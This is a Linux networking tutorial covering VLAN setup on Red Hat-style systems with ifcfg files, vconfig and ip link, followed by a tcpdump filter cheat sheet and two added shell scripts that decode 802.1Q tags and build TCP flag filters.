Also make sure you assign the correct IP address using DHCP or a static IP. Save the file. Remove the gateway entry from all other network config files. Only add the gateway to the /etc/sysconfig/network file. Save and close the file. Restart networking:
# /etc/init.d/network restart
Please note that if you need to configure VLAN ID 2, copy the file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.2 and do the above procedure again.

Using vconfig command

The above method is perfect and works with Red Hat Enterprise Linux / CentOS / Fedora Linux without any problem. However, you will notice that there is a command called vconfig. The vconfig program allows you to create and remove vlan-devices on a VLAN-enabled kernel. Vlan-devices are virtual Ethernet devices which represent the virtual LANs on the physical LAN. (vconfig has since been superseded by ip link from iproute2, e.g. ip link add link eth0 name eth0.5 type vlan id 5.)

Please note that this is yet another method of configuring VLAN. If you are happy with the above method there is no need to read below.

Add VLAN ID 5 with the following command for eth0:
# vconfig add eth0 5

The vconfig add command creates a vlan-device on eth0 which results in an eth0.5 interface. You can use the normal ifconfig command to see device information:
# ifconfig eth0.5
Use ifconfig to assign an IP address to the VLAN interface:
# ifconfig eth0.5 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 up
Get detailed information about the VLAN interface:
# cat /proc/net/vlan/eth0.5
If you wish to delete the VLAN interface:
# ifconfig eth0.5 down
# vconfig rem eth0.5

A VLAN is a "Virtual Local Area Network" and is present at L2 (layer 2) of the protocol stack.

A host may be a server, workstation or other device which conforms to the 802.1q specification. Therefore, it is possible (with certain limitations) to attach a laptop to a VLAN seen by a server.

802.1q provides for an additional 4 bytes of information added to the L2 frame, 12 bits of which carry the VLAN ID. Thus one may have up to 4K VLANs (IDs 0 and 4095 are reserved, so 4094 are usable).

When you want to configure a VLAN in Linux, assuming your kernel supports it (2.6+ does), you need to make sure 802.1q support is available. This is most easily done with modprobe. So the command:

/sbin/modprobe 8021q

should do the trick.

Then, for any given NIC interface you only have to do the following:

/sbin/vconfig add eth<N> <VLAN-ID>
/sbin/ifconfig eth<N>.<VLAN-ID> 192.168.0.x netmask 255.255.255.0

Of course I just picked some arbitrary class C address; you would have to use what is appropriate for you.

You may then need to add to the routing table (not knowing what Linux you are running) something like:

/sbin/route add -net 192.168.0.0 netmask 255.255.255.0 eth<N>.<VLAN-ID>

ALL THE ABOVE MUST BE DONE AS ROOT.

Virtual LAN configuration

You can create a VLAN on Linux by executing the following commands:
vconfig add <interface> <vlan-id>
ifconfig <interface>.<vlan-id> <ip-address> netmask <netmask>
ifconfig <interface>.<vlan-id> up

For example:
vconfig add eth0 6
ifconfig eth0.6 192.168.1.6 netmask 255.255.255.0
ifconfig eth0.6 up

You can view the statistics of that VLAN interface by executing the following command:

cat /proc/net/vlan/eth0.6

In this way you can configure up to 4094 VLANs on one physical interface.
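Two parts of the text above are worth seeing as working code: the 4-byte 802.1Q tag whose 12 VID bits limit you to 4094 VLANs, and the ifcfg-eth0.N file the Red Hat procedure has you edit by hand. The script below is an added example and not from the original article; the hex frames in it are constructed for the example, and the range and VLAN-1 checks are this editor's, not something the vconfig or ifcfg tooling performs.

```shell
#!/bin/sh
# Added example, not from the original article: decode the 802.1Q tag of a raw Ethernet
# frame and generate the ifcfg-<parent>.<id> file the procedure above edits by hand.

# Constructed for this example: the first bytes of a tagged and an untagged frame, as hex.
# Layout: dst MAC (6) | src MAC (6) | TPID 0x8100 (2) | TCI (2) | EtherType (2) | payload...
TAGGED_FRAME_HEX='ffffffffffff0011223344558100a005080045'
UNTAGGED_FRAME_HEX='ffffffffffff0011223344550800'

# vlan_tag_decode HEX: "vid=<id> pcp=<prio> ethertype=0x<type>" for a tagged frame, else
# "untagged". The 16-bit TCI is 3 bits PCP, 1 bit DEI and 12 bits VID, hence the masks.
vlan_tag_decode() {
  hex=$1
  tpid=$(printf '%s' "$hex" | cut -c25-28)
  if [ "$tpid" != "8100" ]; then
    echo untagged
    return 0
  fi
  tci_hex=$(printf '%s' "$hex" | cut -c29-32)
  tci=$(( 0x$tci_hex ))
  ethertype=$(printf '%s' "$hex" | cut -c33-36)
  echo "vid=$(( tci & 0x0fff )) pcp=$(( tci >> 13 )) ethertype=0x$ethertype"
}

# make_vlan_ifcfg PARENT VID IPADDR NETMASK: print the ifcfg file for PARENT.VID, refusing
# IDs outside the 802.1Q range and warning about VLAN 1 (the default/native VLAN).
make_vlan_ifcfg() {
  parent=$1; vid=$2; ipaddr=$3; netmask=$4
  case $vid in
    ''|*[!0-9]*) echo "VLAN ID must be a number, got '$vid'" >&2; return 1 ;;
  esac
  if [ "$vid" -lt 1 ] || [ "$vid" -gt 4094 ]; then
    echo "VLAN ID $vid is outside the usable 802.1Q range 1-4094" >&2
    return 1
  fi
  [ "$vid" -eq 1 ] && echo "warning: VLAN 1 is the native/admin VLAN on most switches" >&2
  printf 'DEVICE=%s.%s\nVLAN=yes\nBOOTPROTO=static\nIPADDR=%s\nNETMASK=%s\nONBOOT=yes\n' \
    "$parent" "$vid" "$ipaddr" "$netmask"
}

# e.g. make_vlan_ifcfg eth0 5 192.168.1.100 255.255.255.0 > /etc/sysconfig/network-scripts/ifcfg-eth0.5
```

The decoder is also a quick way to confirm what is actually on the wire: dump a frame from the trunk port with tcpdump -e -xx and feed the first 18 bytes to vlan_tag_decode; a frame that comes back "untagged" on a port you believe is a trunk is a switch configuration problem, not a Linux one.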

Advantages of VLANs

VLANs provide a number of benefits to a network designer. The first advantage is the number of devices required to implement a given network topology can be reduced. Without VLANs, if your network design requires ten machines divided into five different LANs, you would need five different switches or hubs, and most of the ports would be wasted. With VLANs, this work could be done with one device.

Most routers and standard computers can support a limited number of physical network interfaces. Although dual and quad-port Ethernet adapters are available, these are expensive. For example, a quad-port Ethernet card may cost $400. VLAN capable switches start at around $500, but they support many more interfaces.

Depending on the scenario, VLANs and trunks can provide an effective way of segmenting a network without the expense and complexity of managing many physical interfaces.

 

TCPDUMP MANUAL

December 20, 2008
  • Basic communication // see the basics without many options
    # tcpdump -nS
  • Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name resolution
    # tcpdump -nnvvS
  • A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet
    # tcpdump -nnvvXS
  • Heavy packet viewing // the final "s" increases the snaplength, grabbing the whole packet
    # tcpdump -nnvvXSs 1514

 

 

Recipes

 

  1. host // look for traffic based on IP address (also works with hostname if you’re not using -n)
    # tcpdump host 1.2.3.4
  2. src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
    # tcpdump src 2.3.4.5
    # tcpdump dst 3.4.5.6
  3. net // capture an entire network using CIDR notation
    # tcpdump net 1.2.3.0/24
  4. proto // works for tcp, udp, and icmp. Note that you don’t have to type proto
    # tcpdump icmp
  5. port // see only traffic to or from a certain port
    # tcpdump port 3389
  6. src, dst port // filter based on the source or destination port
    # tcpdump src port 1025
    # tcpdump dst port 3389

TCP traffic from 10.5.2.3 destined for port 3389:
# tcpdump tcp and src 10.5.2.3 and dst port 3389

Traffic originating from the 192.168 network headed for the 10 or 172.16 networks (and binds tighter than or, so the parentheses are needed; without them the filter also matches any traffic to 172.16/16 regardless of source):
# tcpdump 'src net 192.168.0.0/16 and (dst net 10.0.0.0/8 or 172.16.0.0/16)'

Non-ICMP traffic destined for 192.168.0.2 from the 172.16 network:
# tcpdump dst 192.168.0.2 and src net 172.16.0.0/16 and not icmp

Traffic originating from Mars or Pluto that isn't to the SSH port (again parenthesised; otherwise "not dst port 22" applies only to Pluto):
# tcpdump -vv '(src mars or pluto) and not dst port 22'

Traffic that's from 10.0.2.4 AND destined for ports 3389 or 22 (inside single quotes the parentheses need no backslashes; those are only required when the filter is typed unquoted):
# tcpdump 'src 10.0.2.4 and (dst port 3389 or 22)'

Show me all URG packets:
# tcpdump 'tcp[13] & 32 != 0'

Show me all ACK packets:
# tcpdump 'tcp[13] & 16 != 0'

Show me all PSH packets:
# tcpdump 'tcp[13] & 8 != 0'

Show me all RST packets:
# tcpdump 'tcp[13] & 4 != 0'

Show me all SYN packets:
# tcpdump 'tcp[13] & 2 != 0'

Show me all FIN packets:
# tcpdump 'tcp[13] & 1 != 0'

Show me all SYN-ACK packets:
# tcpdump 'tcp[13] = 18'

 

Display all IPv6 traffic:

# tcpdump ip6

  • Show all traffic with both SYN and RST flags set (should never happen): # tcpdump 'tcp[13] = 6'
  • Show all traffic with the "evil bit" (the reserved IP flag of RFC 3514) set: # tcpdump 'ip[6] & 128 != 0'
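The tcp[13] filters above are all the same trick: byte 13 of the TCP header is the flags byte, and each flag is one bit of it (FIN 1, SYN 2, RST 4, PSH 8, ACK 16, URG 32, plus ECE 64 and CWR 128), so "= 18" is SYN+ACK and "& 32 != 0" is "URG set". The script below is an added example, not part of the original cheat sheet; it derives those filters from flag names and decodes a flags byte back into names.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: build and decode the tcp[13] flag-byte
# filters listed above, so a filter like 'tcp[13] = 18' is derived instead of memorised.

# tcp_flag_bit NAME: bit value of one TCP flag within the flags byte (offset 13 of the TCP header)
tcp_flag_bit() {
  case $(printf '%s' "$1" | tr 'a-z' 'A-Z') in
    FIN) echo 1 ;;  SYN) echo 2 ;;  RST) echo 4 ;;  PSH|PUSH) echo 8 ;;
    ACK) echo 16 ;; URG) echo 32 ;; ECE) echo 64 ;; CWR) echo 128 ;;
    *) echo "unknown TCP flag: $1" >&2; return 1 ;;
  esac
}

# tcp_flags_value FLAG...: OR of the bits, e.g. SYN ACK -> 18
tcp_flags_value() {
  total=0
  for f in "$@"; do
    b=$(tcp_flag_bit "$f") || return 1
    total=$(( total | b ))
  done
  echo "$total"
}

# tcpdump_flags_exact FLAG...: filter matching packets with exactly these flags and no others
tcpdump_flags_exact() { echo "tcp[13] = $(tcp_flags_value "$@")"; }

# tcpdump_flags_any FLAG...: filter matching packets with at least one of these flags set
tcpdump_flags_any() { echo "tcp[13] & $(tcp_flags_value "$@") != 0"; }

# tcp_flags_decode VALUE: names of the flags set in a flags byte, e.g. 18 -> "SYN ACK"
tcp_flags_decode() {
  v=$1; out=""
  for name in FIN SYN RST PSH ACK URG ECE CWR; do
    b=$(tcp_flag_bit "$name")
    if [ $(( v & b )) -ne 0 ]; then out="$out $name"; fi
  done
  printf '%s\n' "${out# }"
}

# e.g. tcpdump -n "$(tcpdump_flags_exact SYN)"   captures bare SYNs (connection attempts / SYN scans)
```

Note the difference between the two builders: "tcp[13] = 18" matches only packets whose flags byte is exactly SYN+ACK, so a SYN+ACK with ECE set (as in ECN negotiation) is missed, whereas "tcp[13] & 18 = 18" would match it; current libpcap also accepts the symbolic form tcp[tcpflags] & (tcp-syn|tcp-ack) == (tcp-syn|tcp-ack), which reads better in saved filters.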